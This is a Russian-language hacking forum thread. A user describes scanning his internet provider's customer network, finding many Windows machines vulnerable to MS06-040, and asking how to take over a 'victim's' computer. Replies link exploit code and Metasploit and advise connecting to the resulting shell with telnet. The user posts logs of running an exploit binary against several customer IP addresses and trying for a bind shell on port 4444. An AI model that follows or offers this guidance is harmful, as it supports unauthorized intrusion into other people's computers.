![]() |
Удаленное выполнение команд (ms06-040)
Решил просканировать сеть своего провайдера (Domolink) и нашёл одну уязвимость у большого количества пользователей, уязвимость ms06-040.
Сканирую я программой XSpider. Прошу вас объяснить как с помощью этой уязвимости можно получить доступ к компьютеру жертвы, зарание большое спасибо и плбсы с меня :) . ```````````````````````````````````` Краткое описание: Уязвимости позволяют удаленному атакующему выполнить произвольный код с системными привилегиями. Подробное описание: В службе Server присутствует уязвимость переполнения буфера. Удаленный атакующий с помощью специальным образом сформированного запроса может вызвать отказ в обслуживании или выполнить произвольный код с системными привилегиями и получить полный контроль над системой. Уязвимые версии: Microsoft Windows 2000 Service Pack 4 Microsoft Windows XP Service Pack 1 Microsoft Windows XP Service Pack 2 Microsoft Windows Server 2003 Microsoft Windows Server 2003 Service Pack 1 ```````````````````````````````````` |
Этот вопрос обсуждался здесь
|
Цитата:
|
А там юзверь скинул ссылку на страницу http://www.securitylab.ru/poc/extra/271817.php , что делать с кодом, то там написан?)
|
на милворме пробывал искать?
http://milw0rm.com/exploits/2265 |
Хм ... А в каком регионе ты живеш ? Уязвимость есть во всех сетях домолинк ?
|
это РоС код, т.е. показательное эксплуатирование )))
запускаешь через metasploit =) PS Хня на постном масле :Р |
Цитата:
|
Цитата:
|
Цитата:
|
теперь понял, спс))
|
Народ, подскажите, вот кажется ломанул я комп, пишет:
F:\>2.exe 10.130.140.51 2 [+] Connecting to 10.130.140.51 ... [+] Binding to RPC interface ... [+] Sending RPC request ... [+] Now check for shell on 10.130.140.51:4444 ! что дальше то? почему-то опять отображается мой диск для ввода(F)!, а ведь как я понимаю должен его (C) (как я понимаю по стандарту)? |
пиши так telnet 10.130.140.51 4444
|
не надо было человеку про метасплойт рассказывать..;)
|
Цитата:
|
Microsoft Windows XP [Версия 5.1.2600]
(С) Корпорация Майкрософт, 1985-2001. F:\Documents and Settings\Илья>св \ "св" не является внутренней или внешней командой, исполняемой программой или пакетным файлом. F:\Documents and Settings\Илья>cd \ F:\>2.exe 10.130.145.7 2 [+] Connecting to 10.130.145.7 ... [+] Binding to RPC interface ... [+] Sending RPC request ... [+] Now check for shell on 10.130.145.7:4444 ! F:\>telnet 10.130.145.7 Подключение к 10.130.145.7...Не удалось открыть подключение к этому узлу, на пор т 23: Сбой подключения F:\>telnet 10.130.145.7 4444 Подключение к 10.130.145.7...Не удалось открыть подключение к этому узлу, на пор т 4444: Сбой подключения F:\>ping 10.130.145.7 Обмен пакетами с 10.130.145.7 по 32 байт: Ответ от 10.130.145.7: число байт=32 время=61мс TTL=127 Ответ от 10.130.145.7: число байт=32 время=61мс TTL=127 Ответ от 10.130.145.7: число байт=32 время=60мс TTL=127 Ответ от 10.130.145.7: число байт=32 время=58мс TTL=127 Статистика Ping для 10.130.145.7: Пакетов: отправлено = 4, получено = 4, потеряно = 0 (0% потерь), Приблизительное время приема-передачи в мс: Минимальное = 58мсек, Максимальное = 61 мсек, Среднее = 60 мсек F:\>2.exe 10.130.145.8 2 [+] Connecting to 10.130.145.8 ... [+] Binding to RPC interface ... [+] Sending RPC request ... [+] Now check for shell on 10.130.145.8:4444 ! F:\>telnet 10.130.145.8 4444 Подключение к 10.130.145.8...Не удалось открыть подключение к этому узлу, на пор т 4444: Сбой подключения F:\>2.exe 10.130.145.13 2 [+] Connecting to 10.130.145.13 ... [+] Binding to RPC interface ... [+] Sending RPC request ... [+] Now check for shell on 10.130.145.13:4444 ! F:\>telnet 10.130.145.13 4444 Подключение к 10.130.145.13...Не удалось открыть подключение к этому узлу, на по рт 4444: Сбой подключения F:\>telnet 10.130.145.13:4444 Подключение к 10.130.145.13:4444...Не удалось открыть подключение к этому узлу, на порт 23: Сбой подключения F:\>2.exe 10.130.145.39 2 [+] Connecting to 10.130.145.39 ... [+] Binding to RPC interface ... [+] Sending RPC request ... [+] Now check for shell on 10.130.145.39:4444 ! F:\>telnet 10.130.145.39 4444 Подключение к 10.130.145.39...Не удалось открыть подключение к этому узлу, на по рт 4444: Сбой подключения F:\>2.exe 10.130.145.51 2 [+] Connecting to 10.130.145.51 ... [+] Binding to RPC interface ... [+] Sending RPC request ... [+] Now check for shell on 10.130.145.51:4444 ! F:\>telnet 10.130.145.51 4444 Подключение к 10.130.145.51...Не удалось открыть подключение к этому узлу, на по рт 4444: Сбой подключения F:\>2.exe 10.130.145.58 2 [+] Connecting to 10.130.145.58 ... [+] Binding to RPC interface ... [+] Sending RPC request ... [+] Now check for shell on 10.130.145.58:4444 ! F:\>telnet 10.130.145.58 4444 Подключение к 10.130.145.58...Не удалось открыть подключение к этому узлу, на по рт 4444: Сбой подключения F:\> `````````````````````` Видимо уже не прёт эта бага... кто-как считает? |
Народ, так в чём проблема? Подскажите плиз! Может фаер? Или ещё что???
|
А он вообще срабатывает? Или в любом случае пишет "Now check for shell on 4444 !"?
|
Срабатывает, я проверял, и пишет это только на дырявых компах :(
|
заюзай метасплоит там легче будет http://www.metasploit.com/framework/downloader/?id=framework-3.0.exe
|
У меня стоит 3.1, только я с ним не разбирался, да и вообще почему-то ничего из него не запускается(
|
Такая распространённая дырка в сети, жаль, что никто не знает как через неё законектиться...жали, жаль...
|
а ты не думал, что в сплойте может стоять защита от детей?
|
Цитата:
|
| Время: 14:05 |